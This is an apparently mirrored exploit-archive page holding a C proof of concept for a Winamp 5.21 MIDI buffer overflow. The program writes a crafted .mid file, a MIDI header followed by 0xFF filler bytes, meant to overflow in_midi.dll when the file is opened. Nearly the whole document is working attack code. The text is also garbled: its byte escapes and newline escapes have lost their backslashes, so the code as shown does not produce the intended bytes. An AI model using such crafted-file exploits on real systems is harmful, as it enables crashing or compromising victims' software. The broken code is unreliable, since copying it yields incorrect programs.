[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC
# Published : 2006-06-20
# Author : BassReFLeX
# Previous Title : XM Easy Personal FTP Server 5.0.1 (Port) Remote Overflow PoC
# Next Title : 0verkill 0.16 (ASCII-ART Game) Remote Integer Overflow Crash Exploit
/*
* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
char header[] = "x4Dx54x68x64x00x00"
"x00x06x00x00x00x01"
"x00x60x4Dx54x72x6B"
"x00x00";
char badc0de[] = "xFFxFFxFFxFFxFFxFF"
"xFFxFFxFFxFFxFFxFF";
int main(int argc,char* argv[])
{
system("cls");
printf("n* ********************************************** *");
printf("n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("n* ********************************************** *");
printf("n* PoC coded by: BassReFLeX *");
printf("n* Date: 19 Jun 2006 *");
printf("n* ********************************************** *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("nFile couldn't open!");
exit(1);
}
printf("nnWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("nFile created successfully!");
printf("nFile: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("nn");
printf("n%s <Filename>",file);
printf("nnFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}
// www.Syue.com [2006-06-20]